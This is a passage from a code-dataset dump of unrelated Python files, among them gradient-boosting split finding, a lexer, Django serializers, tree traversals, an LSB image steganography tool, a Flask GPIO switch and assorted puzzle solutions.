ordered_hessians[i + 1]\n histogram[bin_2]['sum_hessians'] += ordered_hessians[i + 2]\n histogram[bin_3]['sum_hessians'] += ordered_hessians[i + 3]\n\n histogram[bin_0]['count'] += 1\n histogram[bin_1]['count'] += 1\n histogram[bin_2]['count'] += 1\n histogram[bin_3]['count'] += 1\n\n for i in range(unrolled_upper, n_node_samples):\n bin_idx = binned_feature[sample_indices[i]]\n histogram[bin_idx]['sum_gradients'] += ordered_gradients[i]\n histogram[bin_idx]['sum_hessians'] += ordered_hessians[i]\n histogram[bin_idx]['count'] += 1\n\n return histogram\n\n\n@njit(fastmath=False)\ndef _split_gain(gradient_left, hessian_left, gradient_right, hessian_right,\n gradient_parent, hessian_parent, l2_regularization):\n \"\"\"Loss reduction\n\n Compute the reduction in loss after taking a split compared to keeping\n the node a leaf of the tree.\n\n See Equation 7 of:\n XGBoost: A Scalable Tree Boosting System, T. Chen, C. Guestrin, 2016\n https://arxiv.org/abs/1603.02754\n \"\"\"\n def negative_loss(gradient, hessian):\n return (gradient ** 2) / (hessian + l2_regularization)\n\n gain = negative_loss(gradient_left, hessian_left)\n gain += negative_loss(gradient_right, hessian_right)\n gain -= negative_loss(gradient_parent, hessian_parent)\n return gain\n\n\n@njit(locals={'gradient_left': float32, 'hessian_left': float32,\n 'best_gain': float32, 'best_bin_idx': uint8},\n fastmath=True)\ndef find_split(histogram, gradient_parent, hessian_parent, l2_regularization):\n gradient_left, hessian_left = 0., 0.\n best_gain = 0.\n best_bin_idx = 0\n for bin_idx in range(histogram.shape[0]):\n gradient_left += histogram[bin_idx]['sum_gradients']\n hessian_left += histogram[bin_idx]['sum_hessians']\n gradient_right = gradient_parent - gradient_left\n hessian_right = hessian_parent - hessian_left\n gain = _split_gain(gradient_left, hessian_left,\n gradient_right, hessian_right,\n gradient_parent, hessian_parent,\n l2_regularization)\n if gain > best_gain:\n best_gain = gain\n best_bin_idx = bin_idx\n return (best_bin_idx, best_gain)\n","sub_path":"pygbm/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"718772","text":"import MapReduce\nimport sys\n\n# Part 1\nmr = MapReduce.MapReduce()\n \n# Part 2\ndef mapper(record):\n # key: document identifier\n # value: document contents\n key = record[1]\n value = record\n #value.append(record[0])\n #words = value.split()\n #print record\n #print record\n mr.emit_intermediate(key, value) \n \n# Part 3\ndef reducer(key, list_of_values):\n # key: word\n # value: list of occurrence counts\n doc_list = list()\n for v in list_of_values:\n if len(v) == 10:\n basic_list = v\n for v in list_of_values:\n if len(v) == 17:\n new_list = list(basic_list)\n for el in v:\n new_list.append(el)\n mr.emit((new_list))\n\n# Part 4\ninputdata = open(sys.argv[1])\nmr.execute(inputdata, mapper, reducer)\n","sub_path":"assignment3/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"430407725","text":"operateur = {'=': {\"associativity\": \"GAUCHE\", \"precedence\": 1},\n '+': {\"associativity\": \"GAUCHE\", \"precedence\": 2},\n '-': {\"associativity\": \"GAUCHE\", \"precedence\": 2},\n '/': {\"associativity\": \"GAUCHE\", \"precedence\": 3},\n '*': {\"associativity\": \"GAUCHE\", \"precedence\": 3},\n '^': {\"associativity\": \"DROITE\", 
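A quick numeric check of the _split_gain formula above (Equation 7 of the XGBoost paper): each side contributes g**2 / (h + l2) and the parent's score is subtracted back out, so a split that separates opposing gradients has strictly positive gain.

```python
def split_gain(gl, hl, gr, hr, gp, hp, l2=0.0):
    negative_loss = lambda g, h: g * g / (h + l2)
    return (negative_loss(gl, hl) + negative_loss(gr, hr)
            - negative_loss(gp, hp))

# opposing gradients cancel in the parent, so splitting them apart pays off:
print(split_gain(-2.0, 4.0, 2.0, 4.0, 0.0, 8.0))  # 2.0
```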
\"precedence\": 4},\n '(': {\"associativity\": \"GAUCHE\", \"precedence\": 5},\n ')': {\"associativity\": \"GAUCHE\", \"precedence\": 5}}\n\ndef operande_token(line, i):\n\ttmp = ''\n\ttoken = {}\n\tnb_float = 0\n\tvalue_or_name = \"value\"\n\tinconnu = None\n\twhile (i < len(line) and (line[i].isnumeric()\n\t\t\tor line[i] == '.' or line[i].isalpha())):\n\t\tif line[i].isalpha() and value_or_name == \"value\":\n\t\t\tvalue_or_name = \"name\"\n\t\t\tinconnu = ''\n\t\tif value_or_name == \"value\":\n\t\t\tif line[i] == '.': nb_float += 1\n\t\t\tif line[i].isnumeric(): tmp += line[i]\n\t\tif value_or_name == \"name\":\n\t\t\tinconnu += line[i]\n\t\ti += 1\n\tif inconnu and tmp == '': tmp = '1'\n\tif nb_float > 1: return {\"Error\": tmp}, i\n\tif nb_float == 1: token[\"value\"] = float(tmp)\n\tif nb_float == 0: token[\"value\"] = int(tmp)\n\ttoken[\"type\"] = \"operande\"\n\ttoken[\"inconnu\"] = inconnu\n\treturn token, i\n\ndef operator_token(char):\n\ttoken = {}\n\ttoken[\"type\"] = \"operateur\"\n\ttoken[\"value\"] = char\n\ttoken[\"associativity\"] = operateur[char][\"associativity\"]\n\ttoken[\"precedence\"] = operateur[char][\"precedence\"]\n\treturn token\n\n'''Créer un liste qui contient les tokens et verifie qu'il n'y a que des caractères autorisés dans l'expression.'''\ndef generate_tokens(line):\n\tline = line.replace(',', '.')\n\ttokens = []\n\ti = 0\n\tlength = len(line)\n\twhile i < length:\n\t\tif line[i].isnumeric() or line[i].isalpha():\n\t\t\ttoken, i = operande_token(line, i)\n\t\t\ttokens.append(token)\n\t\telse:\n\t\t\ttoken = operator_token(line[i])\n\t\t\ttokens.append(token)\n\t\t\ti += 1\n\tfor token in tokens:\n\t\tif \"Error\" in token:\n\t\t\tprint(\"Error on value :\", token[\"Error\"])\n\t\t\treturn\n\treturn tokens\n\ndef remove_comment(line):\n\tif line[0] == '#':\n\t\treturn None\n\tfor i in range(0, len(line)):\n\t\tif line[i] == '#':\n\t\t\treturn line[:i]\n\treturn line\n\ndef tokenize_expressions(file):\n\texpressions = []\n\tfile = file.strip()\n\tfile = file.replace(\" \", \"\")\n\tsplit = file.split('\\n')\n\tif \"\" in split:\n\t\tsplit.remove(\"\")\n\tfor line in split:\n\t\tline = remove_comment(line)\n\t\tif line:\n\t\t\ttokens = generate_tokens(line)\n\t\t\tif tokens:\n\t\t\t\tprint(tokens)\n\t\t\t\texpressions.append(tokens)\n\treturn expressions","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"640180625","text":"from rest_framework import serializers\nfrom orders.models import OrderItem, Order\nfrom accounts.serializers import CustomerSerializer\n\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = OrderItem\n fields = [\n 'id','order','quantity',\n 'product','price'\n ]\n read_only_fields = ['id','price','order']\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n customer = CustomerSerializer()\n order_items = OrderItemSerializer(source='orderitem_set',many=True)\n\n class Meta:\n model = Order\n fields = ['id','customer','status','total_price','order_items']\n read_only_fields = ['total_price']\n\n def validate_status(self, value):\n if value == 'delivered':\n raise serializers.ValidationError(\"Changing to this status is prohibited\")\n return value\n\n\nclass OrderCreateSerializer(serializers.ModelSerializer):\n order_items = serializers.ListField(\n child=OrderItemSerializer(),\n allow_empty=True\n )\n class Meta:\n model = Order \n fields = 
['id','customer','status','total_price','order_items']\n read_only_fields = ['total_price','status']\n \n def create(self, validated_data):\n order_items = validated_data.pop('order_items')\n order = Order.objects.create(**validated_data)\n for item in order_items:\n OrderItem.objects.create(\n order=order,**item\n )\n order.save()\n return order","sub_path":"orders/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"473944293","text":"import random\nimport MinHeap\n\n# I just want to create a tree, and print it out\n# maybe just work with array implementation first?\ntree = [random.randint(0, 50) for x in range(20)]\n\n# in-order traversal\ndef inOrderTraversal(tree, index):\n # make sure the index we are trying to access is valid\n if index > len(tree) - 1:\n return\n \n # left, current, right\n inOrderTraversal(tree, (2*index + 1))\n print(tree[index])\n inOrderTraversal(tree, (2*index + 2))\n\ndef preOrderTraversal(tree, index):\n if index > len(tree) - 1:\n return\n \n # Root, Left, right\n print(tree[index])\n preOrderTraversal(tree, (2*index + 1))\n preOrderTraversal(tree, (2*index + 2))\n\ndef postOrderTraversal(tree, index):\n if index > len(tree) - 1:\n return\n \n # Left, right, Root\n preOrderTraversal(tree, (2*index + 1))\n preOrderTraversal(tree, (2*index + 2))\n print(tree[index])\n\nprint(\"In-Order Traversal\")\ninOrderTraversal(tree, 0)\n\nprint(\"Pre-Order Traversal\")\npreOrderTraversal(tree, 0)\n\nprint(\"Post-Order Traversal\")\npostOrderTraversal(tree, 0)\n\n# lets test the heap stuff that we just made\nheap = MinHeap.MinHeap()\nfor x in range(20):\n heap.insert(random.randint(0, 100))\n\nprint(\"Current Min Heap: {}\".format(heap.heap))\n","sub_path":"trees_and_graphs/implementations/tree_playground.py","file_name":"tree_playground.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"620007026","text":"import urwid\nfrom .leetcode import Leetcode\nfrom .views import HomeView, DetailView, HelpView\n\npalette = [\n ('body', 'dark cyan', ''),\n ('focus', 'white', ''),\n ('head', 'white', 'dark gray'),\n ('lock', 'dark gray', '')\n ]\n\nclass Terminal(object):\n def __init__(self):\n self.home_view = None\n self.loop = None\n self.leetcode = Leetcode()\n self.help_view = None\n self.quit_confirm_view = None\n self.view_stack = []\n self.detail_view = None\n self.search_view = None\n\n @property\n def current_view(self):\n return None if not len(self.view_stack) else self.view_stack[-1]\n\n @property\n def is_home(self):\n return len(self.view_stack) == 1\n\n def goto_view(self, view):\n self.loop.widget = view\n self.view_stack.append(view)\n\n def go_back(self):\n self.view_stack.pop()\n self.loop.widget = self.current_view\n\n def keystroke(self, key):\n if self.quit_confirm_view and self.current_view == self.quit_confirm_view:\n if key is 'y':\n raise urwid.ExitMainLoop()\n else:\n self.go_back()\n\n elif self.current_view == self.search_view and key is 'enter':\n text = self.search_view.contents[1][0].original_widget.get_edit_text()\n for i, item in enumerate(self.home_view.listbox.contents()):\n if item[0].data.id == text:\n self.home_view.listbox.focus_position = i\n break\n self.go_back()\n\n elif key in ('q', 'Q'):\n self.goto_view(self.make_quit_confirmation())\n\n elif key is 'R':\n items = self.leetcode.hard_retrieve_home()\n 
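The traversals above rely on the usual array-heap index arithmetic; a short check makes the child/parent relations explicit:

```python
tree = list(range(7))   # a complete binary tree stored level by level
i = 2                   # any internal node
left, right, parent = 2 * i + 1, 2 * i + 2, (i - 1) // 2
assert (tree[left], tree[right], tree[parent]) == (5, 6, 0)
```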
self.home_view = self.make_listview(items)\n self.view_stack = []\n self.goto_view(self.home_view)\n\n elif self.is_home and (key is 'l' or key is 'enter' or key is 'right'):\n if self.home_view.listbox.get_focus()[0].selectable():\n if self.detail_view and self.detail_view.title == self.home_view.listbox.get_focus()[0].data.title:\n self.goto_view(self.detail_view)\n else:\n title, body, code = self.leetcode.retrieve_detail(self.home_view.listbox.get_focus()[0].data)\n self.goto_view(self.make_detailview(title, body, code))\n\n elif not self.is_home and (key is 'left' or key is 'h'):\n self.go_back()\n\n elif key is 'H':\n if not self.help_view:\n self.make_helpview()\n self.goto_view(self.help_view)\n\n elif self.is_home and key is 'f':\n self.make_search_view()\n self.goto_view(self.search_view)\n\n else:\n return key\n\n def make_quit_confirmation(self):\n text = urwid.AttrMap(urwid.Text('Do you really want to quit ? (y/n)'), 'body')\n self.quit_confirm_view = urwid.Overlay(text, self.current_view, 'left',\n ('relative', 100), 'bottom', None)\n return self.quit_confirm_view\n\n def make_search_view(self):\n text = urwid.AttrMap(urwid.Edit('Search by id: ', ''), 'body')\n self.search_view = urwid.Overlay(text, self.current_view, 'left',\n ('relative', 100), 'bottom', None)\n return self.search_view\n\n def make_detailview(self, title, body, code):\n quizid = self.home_view.listbox.get_focus()[0].data.id\n self.detail_view = DetailView(title, body, code, quizid, self.leetcode.config)\n return self.detail_view\n\n def make_listview(self, data):\n header = self.make_header()\n self.home_view = HomeView(data, header)\n return self.home_view\n\n def make_header(self):\n if self.leetcode.is_login:\n columns = [\n ('fixed', 15, urwid.Padding(urwid.AttrWrap(\n urwid.Text('%s' % self.leetcode.config.username),\n 'head', ''), left=2)),\n urwid.AttrWrap(urwid.Text('You have solved %d / %d problems. 
' %\n (len(self.leetcode.solved), len(self.leetcode.items))), 'head', ''),\n ]\n return urwid.Columns(columns)\n else:\n text = urwid.AttrWrap(urwid.Text('Not login'), 'head')\n return text\n\n def make_helpview(self):\n self.help_view = HelpView()\n return self.help_view\n\n def run(self):\n self.leetcode.login()\n data = self.leetcode.hard_retrieve_home()\n self.home_view = self.make_listview(data)\n self.loop = urwid.MainLoop(self.home_view, palette, unhandled_input=self.keystroke)\n self.view_stack.append(self.home_view)\n self.loop.run()\n\n\nif __name__ == '__main__':\n term = Terminal()\n term.run()\n","sub_path":"leetcode/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"377264837","text":"import cv2\nimport numpy as np\nimport random\n\n\ndef BinaryToDecimal(binary):\n string = int(binary, 2)\n return string\n\n\ndef strToBinary(s):\n bin_conv = []\n for char in string:\n ascii_val = ord(char)\n if(ascii_val < 64):\n bin_conv.append('0')\n binary_val = bin(ascii_val)\n bin_conv.append(binary_val[2:])\n\n return (''.join(bin_conv))\n\n\ndef encrypt(image, string, extension):\n to_be_appended = \"11111111111111111111111111111111111111111111111111111111111111111111111111111111100000000000011111111111111111111111111111111110\"\n img = cv2.imread(image, 0)\n _bin = strToBinary(string)\n bin_of_str = str(_bin)\n total_size = 256 + len(bin_of_str)\n bin_to_append = to_be_appended + bin_of_str + to_be_appended\n height, width = img.shape\n size = height * width\n rand_no = random.randrange(0, height - 12, 1)\n row = rand_no\n col = rand_no % width\n for i in range(row, height):\n for j in range(width):\n if(len(bin_to_append) != 0):\n if((bin_to_append[0] == '1' and img[i][j] % 2 == 0) or (bin_to_append[0] == '0' and img[i][j] % 2 == 1)):\n if(img[i][j] == 255):\n img[i][j] -= 1\n else:\n img[i][j] += 1\n\n else:\n if(img[i][j] >= 254):\n img[i][j] -= 2\n\n else:\n img[i][j] += 2\n\n bin_to_append = bin_to_append[1:]\n\n cv2.imwrite('abc.' + extension, img)\n if(len(bin_to_append) == 0):\n return 1\n else:\n return 0\n\n\ndef decrypt(image):\n appended_front_and_back = \"11111111111111111111111111111111111111111111111111111111111111111111111111111111100000000000011111111111111111111111111111111110\"\n img = cv2.imread(image, 0)\n height, width = img.shape\n a = \"\"\n for i in range(height):\n for j in range(width):\n a = a + str(img[i][j] % 2)\n print(a.count(appended_front_and_back))\n start_index = a.find(appended_front_and_back)\n start_index = start_index + 128\n a = a[start_index:]\n end_index = a.find(appended_front_and_back)\n a = a[0:end_index]\n str_data = ''\n for i in range(0, len(a), 7):\n temp_data = a[i:i + 7]\n decimal_data = BinaryToDecimal(temp_data)\n str_data = str_data + chr(decimal_data)\n return(str_data)\n\n\nif __name__ == \"__main__\":\n e_or_d = int(input('''Do you want to encrypt or decrypt?\n press 1 to ENCRYPT\n press 2 to DECRYPT\n\n :'''))\n if e_or_d == 1:\n image = input(\"Please enter the image you want to encrypt your message in.. : \")\n extension = image.split('.')\n string = input(\"please enter the message you want to encrypt : \")\n a = encrypt(image, string, extension[1])\n if(a):\n print(\"Sucessfully encrypted!!\")\n else:\n print(\"some error\")\n\n elif e_or_d == 2:\n image = input(\"Please enter the image you want to decrypt your message from.. 
: \")\n a = decrypt(image)\n print(\"Your message has been decrypted Sucessfully\")\n print(\"Your message is: \" + a)\n else:\n print(\"Please restart and type in either 1 to encrypt or 2 to decrypt\")\n","sub_path":"steg.py","file_name":"steg.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"406430374","text":"\"\"\"\nMain class for storing MAPL plans. Such plans\n- are partially ordered\n- may contain speech acts and other higher-level actions\n- store causal links and threat-prevention links between actions\n\n\n\"\"\"\n\nfrom string import Template\nfrom collections import defaultdict\nimport copy\n\nimport networkx\nimport graph\nimport constants\nimport pddl\nfrom utils import Enum\n\nActionStatusEnum = Enum(\"EXECUTABLE\", \"IN_PROGRESS\", \"EXECUTED\", \"FAILED\") \n\nclass OrderingConstraint(object):\n \"\"\"\n An OrderingConstraint is a link between two PlanNodes in a MAPLPlan.\n This is the super class for\n - CausalLink\n - ThreatPreventionLink\n and can be used, e.g., for links in the transitive closure of plans using\n any of the above specialised links.\n \"\"\"\n def __init__(self, fnode, tnode, label=None):\n assert isinstance(fnode, PlanNode)\n assert isinstance(tnode, PlanNode)\n self.fnode = fnode\n self.tnode = tnode\n self.label = label\n def __str__(self):\n if self.label is not None:\n return self.label\n return \"%s -> %s\" % (self.fnode, self.tnode)\n\n\nclass PlanNode(object):\n def __init__(self, action, args, time, status):\n self.action = action\n self.full_args = args\n self.time = time\n self.status = status\n\n self.preconds = set()\n self.replanconds = set()\n self.effects = set()\n self.preconds_universal = set()\n self.replan_universal = set()\n \n self.original_preconds = set()\n self.original_replan = set()\n self.explanations = {}\n \n if not isinstance(action, DummyAction):\n num = len(action.agents) + len(action.maplargs)\n self.args = args[:num]\n else:\n self.args = args\n\n def is_executable(self):\n return self.status == ActionStatusEnum.EXECUTABLE\n\n def is_inprogress(self):\n return self.status == ActionStatusEnum.IN_PROGRESS\n\n def __str__(self):\n #return \"%s(%s)\" % (self.action, self.time)\n def tostr(arg):\n return a.name if hasattr(a,\"name\") else str(a)\n args = [tostr(a) for a in self.args]\n return \"%d: \" % self.time + \" \".join([self.action.name]+args)\n\n def __eq__(self, other):\n return self.__class__ == other.__class__ and self.time == other.time and self.action.name == other.action.name and all(map(lambda a,b: a == b, self.full_args, other.full_args))\n \n def copy(self):\n return self.__class__(self.action, list(self.full_args), self.time, self.status)\n\nclass DummyAction(object):\n def __init__(self, name):\n self.name = name\n def __str__(self):\n return str(self.name)\n\nclass GoalAction(DummyAction):\n def __init__(self, goal):\n self.name = \"goal\"\n self.replan = None\n self.precondition = goal\n def instantiate(self, x):\n pass\n def uninstantiate(self):\n pass\n def __str__(self):\n return str(self.name)\n\nclass DummyNode(PlanNode):\n def __init__(self, name, args, time, status):\n action = DummyAction(name)\n PlanNode.__init__(self, action, args, time, status)\n def __str__(self):\n return str(self.action)\n def __eq__(self, other):\n return self.__class__ == other.__class__ and self.action == other.action\n\nclass MAPLPlan(networkx.MultiDiGraph):\n def __init__(self, init_state=None, goal_condition=None):\n 
networkx.MultiDiGraph.__init__(self)\n\n self.init_node = self.create_init_node(init_state)\n self.goal_node = self.create_goal_node(goal_condition)\n self.add_node(self.init_node)\n self.add_node(self.goal_node)\n self.execution_position = 0\n\n def create_init_node(self, astate):\n ## TODO: astate is still unused\n return DummyNode(\"init\", [], 0, ActionStatusEnum.EXECUTED)\n def create_goal_node(self, astate):\n ## TODO: astate is still unused\n return DummyNode(\"goal\", [], 9999, ActionStatusEnum.EXECUTABLE)\n\n def add_link(self, n1, n2, svar, val, conflict=False):\n if conflict:\n type = \"prevent_threat\"\n else:\n type = \"depends\"\n self.add_edge(n1, n2, svar=svar, val=val, type=type)\n \n def topological_sort(self):\n return networkx.topological_sort(self)\n\n def executable(self):\n result = set()\n for n in self.nodes_iter():\n if n.status != ActionStatusEnum.EXECUTABLE:\n continue\n if all(pred.status == ActionStatusEnum.EXECUTED for pred in self.predecessors(n)):\n result.add(n)\n \n return result\n \n def compute_depths(self):\n visited = set()\n def visit(n):\n if n not in visited:\n visited.add(n)\n predecessors = self.predecessors(n)\n for pred in predecessors:\n visit(pred)\n \n if predecessors:\n self.node[n]['depth'] = max(self.node[pred]['depth'] for pred in predecessors) + 1\n else:\n self.node[n]['depth'] = 0\n for n in self.nodes_iter():\n visit(n)\n\n def predecessors_iter(self, node, link_type=None):\n if link_type and not isinstance(link_type, (list, tuple)):\n link_type = [link_type]\n for p in networkx.MultiDiGraph.predecessors_iter(self, node):\n if not link_type or any(e['type'] in link_type for e in self[p][node].itervalues()):\n yield p\n \n def predecessors(self, node, link_type=None):\n if not link_type:\n return networkx.MultiDiGraph.predecessors(self, node)\n return [p for p in self.predecessors_iter(node, link_type)]\n\n def successors_iter(self, node, link_type=None):\n if link_type and not isinstance(link_type, (list, tuple)):\n link_type = [link_type]\n for s in networkx.MultiDiGraph.successors_iter(self, node):\n if not link_type or any(e['type'] in link_type for e in self[node][s].itervalues()):\n yield s\n \n def successors(self, node, link_type=None):\n if not link_type:\n return networkx.MultiDiGraph.successors(self, node)\n return [n for n in self.successors_iter(node, link_type)]\n \n def pred_closure(self, node, link_type=None):\n open = set([node])\n closed = set([self.init_node])\n result = set()\n while open:\n node = open.pop()\n closed.add(node)\n pred = set(self.predecessors(node, link_type))\n result |= pred\n open |= (pred - closed)\n return result\n\n def succ_closure(self, node, link_type=None):\n open = set([node])\n closed = set()\n result = set()\n while open:\n node = open.pop()\n closed.add(node)\n succ = set(self.successors(node, link_type))\n result |= succ\n open |= (succ - closed)\n return result\n\n def to_dot(self, name=\"plan\", ranks=[]):\n from pygraphviz import AGraph\n def declare_rank(same_rank_list):\n same_rank_list = ['\"%s\"' % r for r in same_rank_list]\n return '{rank=same; %s}' % \" \".join(same_rank_list)\n\n self.compute_depths()\n ranks = defaultdict(list)\n G = AGraph(directed=True, strict=False)\n for n, data in self.nodes_iter(data=True):\n if n == self.init_node:\n continue\n ranks[data['depth']].append(n)\n attrs = {}\n attrs[\"style\"] = \"filled\"\n if n.status == ActionStatusEnum.EXECUTED:\n attrs[\"fillcolor\"] = \"grey\"\n else:\n attrs[\"fillcolor\"] = \"white\"\n \n if n.action.replan:\n 
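The link_type filtering used by predecessors_iter and successors_iter above boils down to inspecting the attribute dicts of parallel edges; a self-contained networkx snippet shows the pattern:

```python
import networkx as nx

g = nx.MultiDiGraph()
g.add_edge("a", "b", type="depends")
g.add_edge("a", "b", type="prevent_threat")   # parallel edge, different type
g.add_edge("c", "b", type="prevent_threat")

def preds(node, link_type):
    return [p for p in g.predecessors(node)
            if any(e["type"] == link_type for e in g[p][node].values())]

assert preds("b", "depends") == ["a"]
assert sorted(preds("b", "prevent_threat")) == ["a", "c"]
```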
attrs[\"shape\"] = \"box\"\n attrs[\"style\"] += \", rounded, dashed\"\n elif isinstance(n.action, pddl.mapl.MAPLAction) and n.action.sensors:\n attrs[\"shape\"] = \"box\"\n attrs[\"style\"] += \", rounded\"\n \n G.add_node(n, **attrs)\n\n for n1,n2, data in self.edges_iter(data=True):\n if n1 == self.init_node:\n continue\n attrs = {}\n if data['type'] == 'prevent_threat':\n attrs[\"style\"] = \"dashed\"\n attrs[\"color\"] = \"darkgreen\"\n attrs[\"label\"] = str(data['svar'])\n else:\n attrs[\"label\"] = \"%s = %s\" % (str(data['svar']), data['val'].name)\n \n G.add_edge(n1, n2, **attrs)\n\n for rank, nodes in ranks.iteritems():\n G.add_subgraph(nodes, rank='same', label=\"rank %d\" % rank)\n\n return G\n","sub_path":"schools/css-2010/team-violet/subarchitectures/planner.sa/src/python/standalone/plans.py","file_name":"plans.py","file_ext":"py","file_size_in_byte":8800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"368136610","text":"#!/Users/lyjsmac/opt/anaconda3/bin/python3.8\n# -*- encoding: utf-8 -*-\n'''\n@File : x的平方根.py\n@Time : 2020/12/28 4:46 下午\n@Author : little_carp\n@Contact : woshiliyujian@gmail.com\n@Desc : None\n'''\n\n# here put the import lib\n'''\n实现int sqrt(int x)函数。\n\n计算并返回x的平方根,其中x 是非负整数。\n\n由于返回类型是整数,结果只保留整数的部分,小数部分将被舍去。\n\n示例 1:\n\n输入: 4\n输出: 2\n示例 2:\n\n输入: 8\n输出: 2\n说明: 8 的平方根是 2.82842..., \n 由于返回类型是整数,小数部分将被舍去。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/sqrtx\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\nclass Solution:\n def mySqrt(self, x: int) -> int:\n # 方法一:二分查找法\n left,right = 0,x\n while left <=right :\n mid = left + (right - left) //2\n # 让中间数来进行平方,与原数进行比较\n mid_square = mid**2\n if mid_square ==x:\n return mid\n elif mid_square > x:\n right = mid-1\n else:\n left = mid+1\n return min(left,right)\n\n\n # 方法二:牛顿迭代法","sub_path":"Week_04/x的平方根.py","file_name":"x的平方根.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"20453039","text":"import copy\nimport os\nimport zipfile\n\nfrom dagster import check\n\n\ndef subset_environment_dict(environment_dict, solid_name):\n '''Drops solid config for solids other than solid_name; this subsetting is required when\n executing a single solid on EMR to pass config validation.\n '''\n check.dict_param(environment_dict, 'environment_dict')\n check.str_param(solid_name, 'solid_name')\n\n subset = copy.deepcopy(environment_dict)\n if 'solids' in subset:\n solid_config_keys = list(subset['solids'].keys())\n for key in solid_config_keys:\n if key != solid_name:\n del subset['solids'][key]\n return subset\n\n\ndef build_pyspark_zip(zip_file, path):\n '''Archives the current path into a file named `zip_file`\n '''\n check.str_param(zip_file, 'zip_file')\n check.str_param(path, 'path')\n\n with zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED) as zf:\n for root, _, files in os.walk(path):\n for fname in files:\n abs_fname = os.path.join(root, fname)\n\n # Skip various artifacts\n if 'pytest' in abs_fname or '__pycache__' in abs_fname or 'pyc' in abs_fname:\n continue\n\n zf.write(abs_fname, os.path.relpath(os.path.join(root, fname), path))\n","sub_path":"python_modules/libraries/dagster-aws/dagster_aws/emr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"469290245","text":"from flask import Flask\nfrom RPi import GPIO\napp = 
Flask(__name__)\n\nGPIO.setmode(GPIO.BCM)\n\nhuman_input = 23\ncar_input = 24\n\nGPIO.setup(human_input, GPIO.OUT)\nGPIO.output(human_input, False)\nGPIO.setup(car_input, GPIO.OUT)\nGPIO.output(car_input, False)\n\n@app.route(\"/on_human\")\ndef on_human():\n global human_input\n GPIO.output(human_input, True)\n return \"On!\"\n\n@app.route(\"/off_human\")\ndef off_human():\n global human_input\n GPIO.output(human_input, False)\n\n return \"Off!\"\n\n@app.route(\"/on_car\")\ndef on_car():\n global car_input\n GPIO.output(car_input, True)\n\n return \"On!\"\n\n@app.route(\"/off_car\")\ndef off_car():\n global car_input\n GPIO.output(car_input, False)\n\n return \"Off!\"\n\nif __name__ == \"__main__\":\n app.run(port=8080)\n GPIO.cleanup()\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"644038583","text":"#[톱니바퀴]\nimport sys\nfrom collections import deque\n\ndef check_left(start, dirs):\n if start < 1 or tob[start][2] == tob[start+1][6]:\n return\n \n # 왼쪽 확인\n if tob[start+1][6] != tob[start][2]:\n check_left(start - 1, -dirs)\n tob[start].rotate(dirs)\n\ndef check_right(start, dirs):\n if start > 4 or tob[start-1][2] == tob[start][6]:\n return\n\n # 오른쪽 확인\n if tob[start-1][2] != tob[start][6]:\n # 인접한 톱니바퀴가 회전 ���능한지부터 먼저 파악한다.\n check_right(start + 1, -dirs)\n tob[start].rotate(dirs)\n\n \n \n# 기준 톱니바퀴가 있을 때, 왼쪽과 맞닿는 지점은 idx 2, 오른쪽은 6이다.\ntob = {}\nfor i in range(1, 5):\n tob[i] = deque(list(map(int, list(sys.stdin.readline().replace(\"\\n\",\"\")))))\nn = int(sys.stdin.readline())\n\nfor _ in range(n):\n num, dirs = map(int, sys.stdin.readline().split())\n check_left(num-1, -dirs)\n check_right(num+1, -dirs)\n # 기준 톱니바퀴를 회전시킨다.\n tob[num].rotate(dirs)\n \nans=0\nfor i in range(4):\n ans += (2**i) * tob[i+1][0]\nprint(ans)\n","sub_path":"baekjoon/samsungtest/14891.py","file_name":"14891.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"34957484","text":"# usr/bin/python3\n# coding:utf-8\n\n\"\"\"\n文件简介: 当前脚本的URL去重工具\n功能简介: 通过MD5加密为每个URL生成一个数据指纹并保存到REDIS数据库中,通过检查指纹实现多线程和分布式下的URL请求去重。\n 通过Requests模块下载网页源代码,并通过LXML模块将下载下来的二进制文件直接转换为XML对象,方便通过XPAHT提取数据。\n 通过Redis模块连接REDIS数据库,保存访问过的URL指纹信息。\n\"\"\"\n\nfrom hashlib import md5\nfrom respDownloader.redisStore import redis_terminal\n\ntry:\n from respDownloader.config import URL_FP_KEY\nexcept ImportError as e:\n URL_FP_KEY = \"url_finger_print\"\n\n\ndef _finger_maker(target_string):\n \"\"\"\n 获取标志字符串,根据字符串生成相应的指纹字符串\n :param target_string: 字符串\n :return: 字符串的指纹(也是字符串)\n \"\"\"\n # 